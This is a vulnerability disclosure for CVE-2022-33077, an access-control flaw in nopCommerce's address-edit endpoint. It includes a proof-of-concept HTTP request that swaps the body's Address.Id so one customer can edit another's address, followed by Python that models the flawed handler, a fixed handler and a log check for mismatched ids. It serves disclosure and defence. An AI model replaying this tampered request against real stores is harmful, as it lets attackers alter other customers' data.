Description
There is an access control vulnerability affecting nopCommerce (≤ 4.50.2) and also affecting the upcoming beta version (4.60). The vulnerability lies in the "addressedit" endpoint, and a malicious customer can modify addresses of other users on the site. This has been assigned CVE-2022-33077.
Proof of concept
- Register two customers (C1 and C2) and add one address for each of them (A1 for C1, A2 for C2). Note down the address Id of both created addresses (call them A1_ID and A2_ID). We will now log in as C1 and modify A2.
- Log in as C1 and capture the POST request that edits your own address, as shown below. The four placeholders in angle brackets (A1_ID, C1's session cookies, A2_ID and C1's CSRF token) are the values you need to replace.
```http
POST /customer/addressedit/<A1_ID> HTTP/2
Host: localhost
Cookie: <C1_Session_Cookies_Here>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 506
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

Address.Id=<A2_ID>&Address.FirstName=testing&Address.LastName=123&Address.Email=hello@hello.lcom&Address.Company=&Address.CountryId=211&Address.StateProvinceId=0&Address.City=sdv&Address.Address1=dsv&Address.Address2=&Address.ZipPostalCode=sdv&Address.PhoneNumber=12&Address.FaxNumber=&__RequestVerificationToken=<C1_CSRF_TOKEN_HERE>
```
- When the above request is sent with C1's session cookies, C2's address (A2) is updated. The server first checks that the address id in the URL (A1_ID) belongs to the customer identified by the session cookie, but it then applies the update to the address id carried in the POST body (Address.Id), which is never checked against the logged-in customer. The record that is validated and the record that is modified should be the same one: the server should only update what it has authorised.
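The logic flaw above reduces to "authorise one identifier, act on another". The following is an added illustration written for this page, not nopCommerce's own code: a minimal in-memory model of the address-edit handler in its flawed form and in a hardened form, plus a review-time check that flags captured requests whose URL id and body `Address.Id` disagree. The store layout, the `owned_by` helper, the function names and the sample ids (101 for A1, 202 for A2) are all constructed assumptions.

```python
from dataclasses import dataclass
from urllib.parse import parse_qs


@dataclass
class Address:
    id: int
    owner: int        # customer id that owns this address
    first_name: str
    city: str


def make_store() -> dict:
    """Constructed sample data mirroring the PoC: C1 (id 1) owns A1, C2 (id 2) owns A2."""
    return {
        101: Address(101, 1, "C1-first", "C1-city"),   # A1, owned by C1
        202: Address(202, 2, "C2-first", "C2-city"),   # A2, owned by C2
    }


class Forbidden(Exception):
    pass


def owned_by(store: dict, address_id: int, customer_id: int) -> bool:
    addr = store.get(address_id)
    return addr is not None and addr.owner == customer_id


def address_edit_vulnerable(store, session_customer, url_address_id, form) -> Address:
    """Hypothetical re-implementation of the flaw: ownership is checked for the id in
    the URL, but the update is applied to the id taken from the body (Address.Id)."""
    if not owned_by(store, url_address_id, session_customer):
        raise Forbidden("address in URL does not belong to the logged-in customer")
    target = store[int(form["Address.Id"])]   # BUG: unchecked identifier from the body
    target.first_name = form["Address.FirstName"]
    target.city = form["Address.City"]
    return target


def address_edit_fixed(store, session_customer, url_address_id, form) -> Address:
    """Hardened variant: the record that passed the ownership check is the record that
    gets updated; a body Address.Id that disagrees with the URL is rejected outright."""
    if not owned_by(store, url_address_id, session_customer):
        raise Forbidden("address in URL does not belong to the logged-in customer")
    body_id = form.get("Address.Id")
    if body_id is not None and int(body_id) != url_address_id:
        raise Forbidden("Address.Id in body does not match the address being edited")
    target = store[url_address_id]            # lookup by the authorised id only
    target.first_name = form["Address.FirstName"]
    target.city = form["Address.City"]
    return target


def edit_denied(handler, store, session_customer, url_address_id, form) -> bool:
    """True if the handler refuses the edit (used to compare both variants)."""
    try:
        handler(store, session_customer, url_address_id, form)
    except Forbidden:
        return True
    return False


def url_body_id_mismatch(path: str, body: str) -> bool:
    """Review-time check over captured or logged requests: flags a POST to
    /customer/addressedit/<id> whose form body names a different Address.Id.
    A legitimate edit from the site's own form never produces this mismatch."""
    prefix = "/customer/addressedit/"
    if not path.startswith(prefix):
        return False
    url_id = path[len(prefix):].split("?", 1)[0]
    body_id = parse_qs(body).get("Address.Id", [None])[0]
    return body_id is not None and body_id != url_id


if __name__ == "__main__":
    # C1 (customer 1) edits its own A1 (101) but names A2 (202) in the body.
    tampered = {"Address.Id": "202", "Address.FirstName": "tampered", "Address.City": "x"}
    store = make_store()
    print("vulnerable:", address_edit_vulnerable(store, 1, 101, tampered))  # A2 modified
    store = make_store()
    print("fixed denies:", edit_denied(address_edit_fixed, store, 1, 101, tampered))
    print("mismatch flagged:", url_body_id_mismatch(
        "/customer/addressedit/101", "Address.Id=202&Address.FirstName=tampered"))
```

The fix is the general rule for any edit endpoint: derive the target record from the identifier that was authorised (here the route parameter, or better the authenticated customer's own record set), and treat a client-supplied id in the body as untrusted input to be compared, never as a lookup key. The `url_body_id_mismatch` check is useful when reviewing proxy captures or access logs for this endpoint, since a benign client has no reason to send differing ids.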